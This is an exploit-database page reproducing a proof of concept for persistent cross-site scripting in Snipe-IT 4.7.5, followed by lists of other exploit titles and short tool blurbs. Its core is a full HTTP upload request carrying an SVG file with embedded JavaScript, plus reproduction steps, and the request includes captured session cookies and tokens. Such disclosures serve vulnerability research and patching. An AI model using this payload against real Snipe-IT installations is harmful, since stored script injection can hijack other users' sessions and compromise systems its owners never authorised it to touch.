Search for hundreds of thousands of exploits

"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2019-12-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://snipeitapp.com/
# Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
# Version: 4.7.5
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
# A malicious authorized user could potentially upload an SVG with a javascript payload.

#Steps to Reproduce:

Upload crafted SVG file when sent request to create accessory.
Click created accessory and copy uploaded file location.
Browse uploaded SVG file location on browser.
The alert box will be opened.

#(PoC) Post Request:

POST /accessories HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/accessories/create
Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
Content-Length: 1761
Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
Connection: close
Upgrade-Insecure-Requests: 1

.
..
snip
..
.

Content-Disposition: form-data; name="image"; filename="test.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>

-----------------------------6547029722068941066578895105--
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-04-21"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2020-04-21"CSZ CMS 1.2.7 - 'title' HTML Injection"webappsphp"Metin Yunus Kandemir"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-01-07"Complaint Management System 4.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-03"Online Course Registration 2.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-01"Shopping Portal ProVersion 3.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2020-01-01"Hospital Management System 4.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2019-12-09"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-13"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-08-01"Ultimate Loan Manager 2.0 - Cross-Site Scripting"webappsmultiple"Metin Yunus Kandemir"
2019-07-12"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-06-24"dotProject 2.1.9 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-05-29"Free SMTP Server 2.5 - Denial of Service (PoC)"doswindows"Metin Yunus Kandemir"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47756/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.